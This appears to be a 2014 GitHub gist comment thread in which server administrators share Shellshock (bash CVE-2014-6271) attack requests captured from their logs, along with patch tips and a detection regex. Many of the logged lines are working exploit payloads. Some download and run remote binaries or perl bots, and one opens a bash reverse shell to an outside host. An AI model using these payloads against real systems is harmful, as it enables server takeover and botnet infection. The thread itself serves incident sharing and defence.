Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Ok, shits real. Its in the wild... src:162.253.66.76
GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer:().{.:;.};.wget.-O./tmp/besh.http://162.253.66.76/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*
$ file nginx
nginx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
$ md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$ sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Looking at string variables, it appears to be a kernel exploit with a CnC component.
- found by @yinettesys
@muloka
Copy link

muloka commented Sep 25, 2014

@ABISprotocol re: OSX, that won't patch the system's bash. You have to compile bash yourself, follow these instructions if you want: http://apple.stackexchange.com/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271-and-cve-2014-7/146851#146851

@bmurch
Copy link

bmurch commented Sep 25, 2014

Looks like someone is gathering a list:

grep '() { :;}' *

access_log:89.207.135.125 - - [25/Sep/2014:02:52:27 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

@wilkinson
Copy link

wilkinson commented Sep 25, 2014

I created a gist showing how to add a line to your bashrc to identify the presence of the vulnerability. This is useful to me because I work on many different servers with many different administrators, and I sync my bashrc across machines using Git. I would appreciate input!

Copy link

ghost commented Sep 25, 2014

well that escalated qickly!

@rdev5
Copy link

rdev5 commented Sep 25, 2014

Caught one passing in as User Agent string at 14:34.

Reason: User header "HTTP_USER_AGENT" contains "() { :;}"

IP Address: 93.103.21.231
Hostname: 93-103-21-231.static.t-2.net
Location: Kranj, 52 (Slovenia)
User Agent: () { :;}; wget 'http://taxiairportpop.com/s.php?s=http://target.tld/'

@nicheath
Copy link

nicheath commented Sep 25, 2014

209.126.230.72 - - [25/Sep/2014:00:36:54 +0000] "GET / HTTP/1.0" 200 346 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:11:11:00 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 536 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
198.20.69.74 - - [25/Sep/2014:20:17:06 +0000] "GET / HTTP/1.1" 200 327 "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69"

Surely someone could come up with a creative script to run in place of ping. Maybe tweet the offending scanner IP address with #SHELLSHOCK hashtag.

@Colbert337
Copy link

Colbert337 commented Sep 26, 2014

wow,cool!THX!

@nate-kingsley
Copy link

nate-kingsley commented Sep 26, 2014

Found another:

80.85.87.249 - - [25/Sep/2014:12:07:51 +0000] "GET /cgi-bin/hello HTTP/1.0" 404 290 "-" "() { :;}; /bin/bash -c "wget 82.220.38.36/r.txt -O /tmp/klogd""

@chridd
Copy link

chridd commented Sep 26, 2014

bmurch: shouldn't that be "grep '() {' *"? The colon doesn't have to be a colon for it to work.

@heyflynn
Copy link

heyflynn commented Sep 26, 2014

109.202.102.224 - - [25/Sep/2014:09:44:58 -0500] "GET /cgi-bin/hello HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c "cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

-- this one showed up a couple times on our servers today from netherlands. the source it pulls from http://213.5.67.223/jur has what looks to be a botnet with a worm component.

edit - looks like the 213.5.67.223 removed the exposed file. I have a copy of it, is there anyone in the security community I can send it to? there is some pretty scary looking shit in it. damn perl script has a built in port scanner, bot net tcp/udp flooders and spreader.

@realfx
Copy link

realfx commented Sep 26, 2014

it work on android?

@rdev5
Copy link

rdev5 commented Sep 26, 2014

Can anyone else confirm if this is a suitable intermediary fix whilst we wait for a more permanent fix?

akamai/bash@7caac6e

On OS X, I applied all the patches (http://ftp.gnu.org/gnu/bash/bash-4.3-patches/) and rebuilt bash 4.3 from source after making this change manually to variables.c and it appears to be working. Not able to reproduce the Bash bug vulnerability as such...

@ABISprotocol
Copy link

ABISprotocol commented Sep 26, 2014

Somebody did this that supposedly works for both Mac / OSX and (all?) Linux variants, but test it yourself and have a go: https://shellshocker.net/

@bacbos
Copy link

bacbos commented Sep 26, 2014

Same here, got different requests since yesterday morning: `[26/Sep/2014:09:10:11 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 401 652 "-" "() { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1""``

@UAHR
Copy link

UAHR commented Sep 26, 2014

198.101.206.138 also here:
"GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 1052 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
213.5.67.223 - - [25/Sep/2014:15:46:35 +0200]

...and this one:
"GET /cgi-bin/his HTTP/1.0" 404 1044 "-" "() { :;}; /bin/bash -c "cd /tmp;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur""

@Cherrytreee
Copy link

Cherrytreee commented Sep 26, 2014

A n00b question here:
If the logs show up as 404'd does it mean the UserAgent env were not actually evaluated - i.e. exploit failed ?

@ChrisMCMine
Copy link

ChrisMCMine commented Sep 26, 2014

@Cherrytreee do you have cgi scripts? If not then you're safe atm.

@Cherrytreee
Copy link

Cherrytreee commented Sep 26, 2014

@ChrisMCMine I don't. Thx!

@rdev5
Copy link

rdev5 commented Sep 26, 2014

More in the wild, though it looks like one of those "Is your site affected?" website scanners like shellshocker.net (if not for the remote file fetching). In this case, I wonder if it's necessarily a good idea for people to be creating "Check your website" online testers since it provides a proxy option for people with more malicious intent.

IP Address: 74.201.85.67
Location: Atlanta, GA 30303

http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/info.sh
http://target.tld:80/cgi-bin/test.sh
http://target.tld:80/cgi-bin/php.fcgi
http://target.tld:80/cgi-bin/php

User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"
User Agent: () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1"

Timestamp: 9/26/2014 8:39:45 AM

@ingie
Copy link

ingie commented Sep 26, 2014

@UAHR
[25/Sep/2014:11:10:43 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 403 296 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
snap!

@Neo23x0
Copy link

Neo23x0 commented Sep 27, 2014

I created a regex that matches the different attacks. (egrep compatible v4)

()\s{.;\s}\s*;

Examples:
http://rubular.com/r/FRoObXn9Kx

Copy link

ghost commented Sep 28, 2014

just discovered a new one in our server logs..

X.X.X.X - - [27/Sep/2014:06:18:02 +0200] "GET /de HTTP/1.0" 200 36399 "-" "() { :;}; /bin/bash -c \x22wget -q -O /dev/null http://ad.dipad.biz/test/http://customer-domain-censored.com/\x22""

@behindthefirewalls
Copy link

behindthefirewalls commented Sep 29, 2014

"() { :;}; /bin/bash -c "wget --delete-after http://remika.ru/userfiles/file/test.php\"

@addbook
Copy link

addbook commented Sep 29, 2014

@blues-man
Copy link

blues-man commented Sep 29, 2014

Found this: "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"

Copy link

ghost commented Sep 30, 2014

and another one bites the dust..

62.210.75.170 - - [30/Sep/2014:00:13:28 +0200] "GET /de/cgi-mod/index.cgi HTTP/1.1" 404 315 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y2Vuc29yZWQtZG9tYWluLmNvbVNoZWxsU2hvY2tTYWx0 >> /dev/null'"

@Vic020
Copy link

Vic020 commented Oct 1, 2014

Great,

@clontarfx
Copy link

clontarfx commented Oct 2, 2014

86.34.164.238 - - [28/Sep/2014:13:01:55 +0800] "GET / HTTP/1.0" 200 364 "-" "() { :;}; /bin/bash -c "wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh""

Seems fairly straight-forward.

@tarzand
Copy link

tarzand commented Oct 27, 2014

omg

@ofnothinghere
Copy link

ofnothinghere commented Feb 18, 2017

it work on android?
gif

quotes

memes

wallpaper
thats fine

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment